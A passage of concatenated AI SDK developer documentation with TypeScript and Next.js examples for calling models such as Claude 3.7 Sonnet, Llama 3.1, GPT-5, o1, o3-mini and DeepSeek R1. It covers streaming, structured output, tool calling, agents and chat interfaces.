export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-3-7-sonnet-20250219'),
    messages: convertToModelMessages(messages),
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 12000 },
      } satisfies AnthropicProviderOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            // text parts:
            if (part.type === 'text') {
              return <div key={index}>{part.text}</div>;
            }
            // reasoning parts:
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with Llama 3.1 description: Get started with Llama 3.1 using the AI SDK. tags: ['getting-started']

Get started with Llama 3.1

With the release of Llama 3.1, there has never been a better time to start building AI applications.

Llama 3.1

Benchmarks

Llama 3.1 Benchmarks Source: Meta AI - Llama 3.1 Model Card

Choosing Model Size

Llama 3.1 includes a new 405B parameter model, becoming the largest open-source model available today. This model is designed to handle the most complex and demanding tasks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

import { generateText } from 'ai';
import { bedrock } from '@ai-sdk/amazon-bedrock';

const { text } = await generateText({
  model: bedrock('meta.llama3-1-405b-instruct-v1'),
  prompt: 'What is love?',
});

Streaming the Response

To stream the model's response as it's being generated, update your code snippet to use the streamText function.

import { streamText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { textStream } = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
  prompt: 'What is love?',
});

Generating Structured Data

import { generateObject } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { object } = await generateObject({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and Llama 3.1:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.

Agents

Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.

Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.

Implementing Agents with the AI SDK

The AI SDK supports agent implementation through the maxSteps parameter. This allows the model to make multiple decisions and tool calls in a single interaction.

Here's an example of an agent that solves math problems:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';

const problem =
  'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';

const { text: answer } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  system:
    'You are solving math problems. Reason step by step. Use the calculator when necessary.',
  prompt: problem,
  tools: {
    calculate: tool({
      description: 'A tool for evaluating mathematical expressions.',
      inputSchema: z.object({ expression: z.string() }),
      execute: async ({ expression }) => mathjs.evaluate(expression),
    }),
  },
  maxSteps: 5,
});

In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):

import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Going Beyond Text

Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).

First, create a Server Action.

'use server';

import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

export async function streamComponent() {
  const result = await streamUI({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    prompt: 'Get the weather for San Francisco',
    text: ({ content }) => <div>{content}</div>,
    tools: {
      getWeather: {
        description: 'Get the weather for a location',
        inputSchema: z.object({ location: z.string() }),
        generate: async function* ({ location }) {
          yield <div>loading...</div>;
          const weather = '25c'; // await getWeather(location);
          return (
            <div>
              the weather in {location} is {weather}.
            </div>
          );
        },
      },
    },
  });
  return result.value;
}

On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.

'use client';

import { useState } from 'react';
import { streamComponent } from './actions';

export default function Page() {
  const [component, setComponent] = useState<React.ReactNode>();

  return (
    <div>
      <form
        onSubmit={async e => {
          e.preventDefault();
          setComponent(await streamComponent());
        }}
      >
        <button>Stream Component</button>
      </form>
      <div>{component}</div>
    </div>
  );
}

To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.

Migrate from OpenAI

Here's how simple the migration process can be:

OpenAI Example:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-4.1'),
  prompt: 'What is love?',
});

Llama on DeepInfra Example:

import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is love?',
});

Thanks to the unified API, the core structure of the code remains the same. The main differences are:

Creating a DeepInfra client
Changing the model name from openai("gpt-4.1") to deepinfra("meta-llama/Meta-Llama-3.1-70B-Instruct").

Prompt Engineering and Fine-tuning

While the Llama 3.1 family of models are powerful out-of-the-box, their performance can be enhanced through effective prompt engineering and fine-tuning techniques.

Prompt Engineering

For more information on prompt engineering techniques (specific to Llama models), check out these resources:

Fine-tuning

To learn more about fine-tuning Llama models, check out these resources:

Conclusion

The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with GPT-5 description: Get started with GPT-5 using the AI SDK. tags: ['getting-started']

Get started with OpenAI GPT-5

With the release of OpenAI's GPT-5 model, there has never been a better time to start building AI applications with advanced capabilities like verbosity control, web search, and native multi-modal understanding.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like OpenAI GPT-5 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI GPT-5

OpenAI's GPT-5 represents their latest advancement in language models, offering powerful new features including verbosity control for tailored response lengths, integrated web search capabilities, reasoning summaries for transparency, and native support for text, images, audio, and PDFs. The model is available in three variants: gpt-5, gpt-5-mini for faster, more cost-effective processing, and gpt-5-nano for ultra-efficient operations.

Prompt Engineering for GPT-5

Here are the key strategies for effective prompting:

Core Principles

Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
Natural language works best: While being precise, write prompts as you would explain to a skilled colleague.

Prompting Techniques

1. Agentic Workflow Control

Adjust the reasoningEffort parameter to calibrate model autonomy
Set clear stop conditions and define explicit tool call budgets
Provide guidance on exploration depth and persistence

// Example with reasoning effort control
const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Analyze this complex dataset and provide insights.',
  providerOptions: {
    openai: {
      reasoningEffort: 'high', // Increases autonomous exploration
    },
  },
});

2. Structured Prompt Format Use XML-like tags to organize your prompts:

<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>

<task>
Analyze the attached financial report and identify the most important metrics.
</task>

3. Tool Calling Best Practices

Use tool preambles to provide clear upfront plans
Define safe vs. unsafe actions for different tools
Create structured updates about tool call progress

4. Verbosity Control

Use the textVerbosity parameter to control response length programmatically
Override with natural language when needed for specific contexts
Balance between conciseness and completeness

5. Optimization Workflow

Start with a clear, simple prompt
Test and identify areas of ambiguity or confusion
Iteratively refine by removing contradictions
Consider using OpenAI's Prompt Optimizer tool for complex prompts
Document successful patterns for reuse

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('gpt-5'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Verbosity Control

One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Concise response
const { text: conciseText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // Produces terse, minimal responses
    },
  },
});

// Detailed response
const { text: detailedText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'high', // Produces comprehensive, detailed responses
    },
  },
});

Web Search

GPT-5 can access real-time information through the integrated web search tool:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What are the latest developments in AI this week?',
  tools: {
    web_search: openai.tools.webSearch({
      searchContextSize: 'high',
    }),
  },
});

// Access URL sources
const sources = result.sources;

Reasoning Summaries

For transparency into GPT-5's thought process, enable reasoning summaries:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai.responses('gpt-5'),
  prompt:
    'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    },
  },
});

// Stream reasoning and text separately
for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(part.textDelta);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

Using Tools with the AI SDK

GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { toolResults } = await generateText({
  model: openai('gpt-5'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-5'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({});

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o1

With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

OpenAI o1

The main reasoning model available in the API is:

o1: Designed to reason about hard problems using broad general knowledge about the world.

Model	Streaming	Tools	Object Generation	Reasoning Effort
o1

Benchmarks

OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:

Ranking in the 89th percentile on competitive programming questions (Codeforces)
Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)

Source

Prompt Engineering for o1 Models

Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately.
Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('o1'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Structured object generation is supported with o1.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and o1:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Tools are compatible with o1.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o1'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for the o1 series of reasoning models in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o3-mini

With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.

OpenAI o3-mini

o3-mini offers three reasoning effort levels:

[Low]: Optimized for speed while maintaining solid reasoning capabilities
[Medium]: Balanced approach matching o1's performance levels
[High]: Enhanced reasoning power exceeding o1 in many STEM domains

Model	Streaming	Tool Calling	Structured Output	Reasoning Effort	Image Input
o3-mini

Benchmarks

OpenAI o3-mini demonstrates impressive performance across technical domains:

87.3% accuracy on AIME competition math questions
79.7% accuracy on PhD-level science questions (GPQA Diamond)
2130 Elo rating on competitive programming (Codeforces)
49.3% accuracy on verified software engineering tasks (SWE-bench)

These benchmark results are using high reasoning effort setting.

Source

Prompt Engineering for o3-mini

Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { object } = await generateObject({
  model: openai('o3-mini'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o3-mini'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for o3-mini in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with DeepSeek R1

With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

DeepSeek R1

The series includes two primary variants:

DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.

Benchmarks

DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:

AIME 2024 (Pass@1): 79.8%
MATH-500 (Pass@1): 97.3%
Codeforces (Percentile): Top 4% (96.3%)
GPQA Diamond (Pass@1): 71.5%

Source

Prompt Engineering for DeepSeek R1 Models

DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:

Use a structured format: Leverage the model’s preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { reasoningText, text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Explain quantum entanglement.',
});

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:

import { fireworks } from '@ai-sdk/fireworks';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Or to use Groq's deepseek-r1-distill-llama-70b model:

import { groq } from '@ai-sdk/groq';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: groq('deepseek-r1-distill-llama-70b'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Model Provider Comparison

You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:

Provider	Model ID	Reasoning Tokens
DeepSeek	`deepseek-reasoner`
Fireworks	`accounts/fireworks/models/deepseek-r1`	Requires Middleware
Groq	`deepseek-r1-distill-llama-70b`	Requires Middleware
Azure	`DeepSeek-R1`	Requires Middleware
Together AI	`deepseek-ai/DeepSeek-R1`	Requires Middleware
FriendliAI	`deepseek-r1`	Requires Middleware
LangDB	`deepseek/deepseek-reasoner`	Requires Middleware

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Limitations

